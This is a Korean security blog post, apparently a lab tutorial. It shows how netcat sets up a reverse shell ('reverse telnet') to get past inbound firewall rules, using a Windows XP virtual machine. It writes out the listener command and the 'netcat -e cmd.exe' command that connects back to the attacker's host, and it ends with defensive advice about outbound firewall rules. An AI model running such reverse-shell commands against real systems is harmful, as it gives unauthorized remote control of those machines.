반응형
Recent Posts
Recent Comments
«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
Archives
Today
Total
관리 메뉴

Synchronized's Database

[Tool]netcat 을 사용한 Reverse Telnet 사용하기 본문

정보보안이야기/네트워크 보안

[Tool]netcat 을 사용한 Reverse Telnet 사용하기

커피를마시면잠이안와 2012. 3. 9. 16:29
반응형

1.개요
이전 포스팅에는 netcat을 사용해서 포트스캔하는 방법을 알아봤습니다. 이번에는 netcat을 사용해서 리버스텔넷을 하는 방법을 알아볼께요.

2.설명
리버스텔넷은 주로 앞단에 방화벽이 존재하는 시스템을 공격할 때 사용됩니다.
보통 방화벽 정책을 보면, 인바운드 정책은 80포트 이외에 필요한 포트만 열어놓고 나머지 포트는 허용을 시키지 않습니다. 하지만 아웃바운드 정책에 대해서는 별다른 필터링 정책을 걸어놓지 않기 때문에 리버스텔넷이 유용하다고 볼 수 있습니다.

일반적으로 보통 텔넷은 클라이언트가 서버에 접속하지만, 리버스 텔넷은 서버가 클라이언트에 접속을 하게 됩니다.
이론만 봐서는 글쓰는 저도 이해가 잘 안가네요. 실습을 한번 해보겠습니다. ㅋ

실험 환경은 다음과 같습니다.
공격자가 제 PC이며 가상머신의 WinXP를 서버라고 가정해 보겠습니다.

서버의 IP를 우선 확인해 보겠습니다. 아래 그림과 같습니다.


다음은 공격자의 IP를 알아보겠습니다.


이런 제 이름이 나왔네요.. 이건 신경쓰시지 마시고요. 일단 공격자 IP와 서버 IP를 확인해 보았습니다.
서버 : 10.0.2.15
공격자 : 192.168.0.117

이제 공격자는 netcat을 이용하여 50005번 포트를 열어놓도록 하겠습니다.
명령어는 다음과 같습니다.
netcat -l -p 50005 
여기서 -p는 포트로 뒤에 숫자의 포트를 -l LISTENING 즉, 50005번 포트에서 접속을 대기하고 있겠다 라는 의미입니다.


좀 더 자세한 netcat의 옵션은 이전 포스팅의 첨부된 netcat sheet를 참조하시기 바랍니다.
공격자의 50005번 포트가 LISTENING 상태가 되어있는지 한 번 확인해 볼까요? ㅋ


네.. 대기타고 있군요.

이제 서버에서 공격자로 50005번 포트로 접속을 하기만 하면 됩니다.
서버에서 명령은 다음과 같습니다.
netcat -e cmd.exe [공격자IP주소] [공격자가 대기중인 포트]


이제 그럼 공격자 측에서는 어떤 상황이 벌어졌는지 한번 확인해 보겠습니다.


공격자에서 서버측의 명령 프롬프트가 열렸습니다.
여기서 공격자의 50005번 네트워크 접속상태를 한번 확인해 보겠습니다.


LISTENING이 아닌 ESTABLISHED 가 확인이 되었습니다.

3.결론
리버스텔넷을 설명하고 실습까지 해보았는데요... 리버스텔넷을 막기 위해 보안관리자들은 방화벽의 아웃바운드 정책을 타이트하게 할 필요가 있겠습니다. 그리고 파일업로드 공격에 대해 잘 대응하면 될 것 같습니다.
여기까지 리버스텔넷에 대한 설명이었습니다. Ubuntu로도 설명을 하려고 했는데, 포스팅이 너무 길어질 것 같아서 윈도우로만 하였습니다.
감사합니다.
반응형